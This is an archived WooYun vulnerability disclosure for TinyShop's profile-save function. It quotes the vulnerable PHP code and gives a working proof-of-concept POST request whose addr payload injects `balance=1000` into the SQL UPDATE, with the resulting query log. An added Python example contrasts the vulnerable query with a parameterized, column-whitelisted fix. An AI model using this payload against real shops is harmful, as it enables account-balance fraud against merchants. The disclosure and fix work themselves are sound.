WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------- http://drop.zone.ci/
2014-09-03: Details sent to the vendor, awaiting vendor handling
2014-09-03: Vendor confirmed; details disclosed to the vendor only
2014-09-06: Details opened to third-party security partners
2014-10-28: Details opened to core white hats and domain experts
2014-11-07: Details opened to regular white hats
2014-11-17: Details opened to intern white hats
2014-12-02: Details made public
Heard the general-purpose (通用型) category is rewarding now, so let's test it.
I had seen a balance-inflation (刷钱) vulnerability in it before, which was patched, but on a second look it is still exploitable: only the earlier issue of POST data overwriting the data array was fixed. /protected/controllers/ucenter.php, line 393:
public function info_save() {
    $rules = array(
        'name:required:昵称不能为空!',
        'real_name:required:真实姓名不能为空!',
        'sex:int:性别必需选择!',
        'birthday:date:生日日期格式不正确!',
        'mobile:mobi:手机格式不正确',
        'phone:phone:电话格式不正确'
    );
    $info = Validator::check($rules);
    if (is_array($info)) {
        $this->redirect("info", false, array('msg' => array("info", $info['msg'])));
    } else {
        $data = array(
            'name'      => Filter::str(Req::args('name')),
            'real_name' => Filter::str(Req::args('real_name')),
            'sex'       => Filter::int(Req::args('sex')),
            // the following values go into the UPDATE straight from the request
            'birthday'  => Req::args('birthday'),
            'mobile'    => Req::args('mobile'),
            'phone'     => Req::args('phone'),
            'province'  => Req::args('province'),
            'city'      => Req::args('city'),
            'county'    => Req::args('county'),
            'addr'      => Filter::text(Req::args('addr'))
        );
    }
    $name = Filter::sql(Req::args("name"));
    $id = $this->user['id'];
    $this->model->table("user")->data(array("name" => $name))->where("id=$id")->update();
    // $data is written to the customer table, which also holds the balance column
    $this->model->table("customer")->data($data)->where("user_id=$id")->update();
    $obj = $this->model->table("user as us")
        ->join("left join customer as cu on us.id = cu.user_id")
        ->fields("us.*,cu.group_id,cu.login_time")
        ->where("us.id=$id")
        ->find();
    $this->safebox->set('user', $obj, $this->cookie_time);
    $this->redirect("info");
}
From the code above, the filtering at the following places is insufficient:
    'birthday'  => Req::args('birthday'),
    'mobile'    => Req::args('mobile'),
    'phone'     => Req::args('phone'),
    'province'  => Req::args('province'),
    'city'      => Req::args('city'),
    'county'    => Req::args('county'),
    'addr'      => Filter::text(Req::args('addr'))
This allows SQL injection, but that is not what we care about here: the user's account balance column `balance` is in the same table, so the UPDATE statement itself can be used to add money to our own account, instead of using this injection point for blind injection.
PoC:
POST /tinyshop/index.php?con=ucenter&act=info_save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://localhost/tinyshop/index.php?con=ucenter&act=info
Cookie: CNZZDATA80862620=cnzz_eid%3D163438544-1407551214-http%253A%252F%252Flocalhost%252F%26ntime%3D1408007142; bdshare_firstime=1407551237892; tm_ibc=0; ZDEDebuggerPresent=php,phtml,php3; CNZZDATA1670348=cnzz_eid%3D2114245156-1409299086-http%253A%252F%252Flocalhost%252F%26ntime%3D1409299086; ver=free; PHPSESSID=f2943c79c9d287ef2a0136f0525e9fb3; language=5ad2ae3c20c17a82d4b61aaa71f61e05f5b4a0a2s%3A5%3A%22zh_cn%22%3B; 1_product=f5de13e802a02fac20482edfe9ee2d303641bc6ds%3A1%3A%221%22%3B; pageSize=7fe99f844d5233ed16ab2d46f0b885fe7b213e04s%3A2%3A%2220%22%3B; safecode=1; Tiny_autologin=ed6460c9a8OTU2Nzg2NTAwMmFiNDQ9NTsyMzBjOGJlNjAyZjJlY2c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

name=test1%40qq.com&real_name=1&sex=0&birthday=2014-09-30&mobile=13900000001&phone=13222222222&province=420000&city=421300&county=421301&addr=111111',balance=1000#
SQL query log:
187323 Query update tiny_customer set `real_name` = '1',`sex` = 0,`birthday` = '2014-09-30',`mobile` = '13900000001',`phone` = '13222222222',`province` = 420000,`city` = 421300,`county` = 421301,`addr` = '111111',balance=1000#' where user_id=4
The result:
[Screenshot: changed]
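An added example, not TinyShop's code: a constructed Python stand-in for the `data()->where()->update()` chain. The string-building version reproduces the statement seen in the query log above, while the hardened version whitelists the columns a customer may edit and binds every value, and is run against an in-memory SQLite table. Table and column names follow the report; the `EDITABLE` whitelist, `INT_COLS` and the function names are assumptions.

```python
"""Constructed stand-in for the info_save UPDATE path (not TinyShop's code)."""
import sqlite3

# Form fields from the PoC body (constructed copy); `addr` carries the payload.
REQUEST = {
    "real_name": "1", "sex": "0", "birthday": "2014-09-30",
    "mobile": "13900000001", "phone": "13222222222",
    "province": "420000", "city": "421300", "county": "421301",
    "addr": "111111',balance=1000#",
}
INT_COLS = {"sex", "province", "city", "county"}   # rendered unquoted (assumed)
# Columns a customer may edit about themselves; `balance` is deliberately absent (assumed policy).
EDITABLE = ("real_name", "sex", "birthday", "mobile", "phone",
            "province", "city", "county", "addr")

def vulnerable_update_sql(data: dict, user_id: int) -> str:
    """Mimic the original builder: values are interpolated straight into the statement."""
    parts = []
    for col, val in data.items():
        lit = val if col in INT_COLS else f"'{val}'"
        parts.append(f"`{col}` = {lit}")
    return f"update tiny_customer set {','.join(parts)} where user_id={user_id}"

def hardened_update(conn: sqlite3.Connection, data: dict, user_id: int) -> int:
    """Whitelist the columns and bind every value; returns the affected row count."""
    cols = [c for c in data if c in EDITABLE]          # drops e.g. a posted `balance`
    set_clause = ", ".join(f"{c} = ?" for c in cols)
    params = [data[c] for c in cols] + [user_id]
    cur = conn.execute(f"UPDATE tiny_customer SET {set_clause} WHERE user_id = ?", params)
    return cur.rowcount

def demo() -> tuple:
    """Apply the hardened update to a constructed in-memory table; return (addr, balance)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tiny_customer (user_id INTEGER, real_name TEXT, sex INTEGER,"
                 " birthday TEXT, mobile TEXT, phone TEXT, province INTEGER, city INTEGER,"
                 " county INTEGER, addr TEXT, balance INTEGER)")
    conn.execute("INSERT INTO tiny_customer (user_id, balance) VALUES (4, 0)")
    posted = dict(REQUEST, balance="1000")   # also the bare-field route fixed earlier
    hardened_update(conn, posted, 4)
    return conn.execute("SELECT addr, balance FROM tiny_customer WHERE user_id = 4").fetchone()

if __name__ == "__main__":
    print(vulnerable_update_sql(REQUEST, 4))   # the statement seen in the query log
    print(demo())                              # ("111111',balance=1000#", 0)
```

With the hardened path the payload is stored verbatim as the address and the balance stays untouched, which is the behaviour a regression test for this report should assert.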
Severity: Low
Vulnerability Rank: 5
Confirmed: 2014-09-03 23:30
Thank you very much for your contribution to TinyShop's information security. This issue has several causes, and several submitters have all reported this same spot; we will fix them together as soon as possible. Thank you for your support.
None